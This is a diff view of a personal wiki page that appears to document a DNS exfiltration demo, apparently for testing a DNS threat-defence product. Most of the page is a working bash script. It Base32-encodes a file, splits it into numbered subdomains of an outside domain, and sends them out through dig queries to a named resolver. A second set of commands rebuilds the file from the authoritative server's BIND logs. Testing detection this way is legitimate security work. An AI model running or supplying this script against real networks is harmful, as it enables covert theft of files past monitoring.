Saucepan

User Tools

Site Tools

Trace: ssh dns_transfer install_nginx visudo ntp deploy_reporting_vm install_oracle_11gr2 routing bash firewall_rules
dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
dns:dns_exfiltration [2023/05/28 19:39] bstafforddns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
 ===== Simple Exfiltration ===== ===== Simple Exfiltration =====
 Note that the BIND logs will be approximately 17 times the size of the transferred file. Note that the BIND logs will be approximately 17 times the size of the transferred file.
-<code>SOURCE=/home/name/dns_exfil_test/releasenotes.pdf+ 
 +Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 
 +<code># File to be exfiltrated 
 +SOURCE=/home/name/dns_exfil_test/file.pdf 
 + 
 +
 ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
-ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt +ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt 
-DOMAIN=domain.com+ 
 +# SLD of exfiltration domain 
 +DOMAIN=ferrety-solutions.com 
 + 
 +# sub-domain off SLD that we change for every file
 SUBDOM=asdf SUBDOM=asdf
-LOCALDNS=protectivedns.example.com+ 
 +# Target DNS server (e.g. NIOS with DFP or BloxOne Host) 
 +# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100 
 + 
 +# Log file that the DNS queries can be found in on the authoritative DNS server
 BIND_LOG_FILE=/var/log/named/query.log BIND_LOG_FILE=/var/log/named/query.log
-DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf 
  
 +# File to put the decrypted, received file into (should be a replica of SOURCE)
 +DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
-# Encrypt source file into Base32 and then split into strings of 32 characters each. Then suffix on the domain to query. 
-base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > $ENCRYPTED 
  
-Use DIG to iterate over the file and resolve the DNS+Encrypt source file into Base32 
-dig +short A @$LOCALDNS -$ENCRYPTED+# then split into strings of 32 characters each.  
 +# Then suffix on the domain to query. 
 +# Then add the line number to the start of each line (i.e. put a sequence number on each query) 
 +# Then replace the whitespace at the start of each line with nothing (i.e remove it) 
 +# Then replace the TAB between the number and domain with a "." 
 +base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g"$ENCRYPTED
  
-OR+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate) 
 + 
 +# Exfiltrate the file with DIG. 
 +dig +short A @$LOCALDNS -f $ENCRYPTED
  
-for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 1;done 
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
-# Parse DNS Server logs, extract queries to exfiltration domain+## The following commands get run on the command auth DNS server. 
 +# Parse DNS Server logs 
 +# Then limit the scope just the queries associated with the SUBDOM that we set (i.e. ignore all the other random stuff we get/ignore any other exfiltration tasks running). 
 +# Then extract just the FQDN query itself 
 +# Then strip the ( character 
 +# Then strip the ): character 
 +# Put the output into ENCRYPTED2 (i.e the DNS server's copy of the encrypted file.
 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2
  
-# Convert back from Base32 and recreate original file. +Take the ENCRYPTED2 file 
-cat $ENCRYPTED2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>+# Then stip off the DOMAIN bit of the data. 
 +# Then sort the output as sometimes queries come in on the wrong order. 
 +# remove duplicate queries (BloxOne Threat Defense seems to duplicate stuff a bit). 
 +# Then strip out the new line character to so we just have a bunch of Base32 code. 
 +# Then convert Base32 back to normal file. 
 +Convert back from Base32 and recreate original file. 
 +cat $ENCRYPTED2 | sed "s/.$SUBDOM.$DOMAIN//g" | sort | uniq | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>
dns/dns_exfiltration.1685302799.txt.gz · Last modified: by bstafford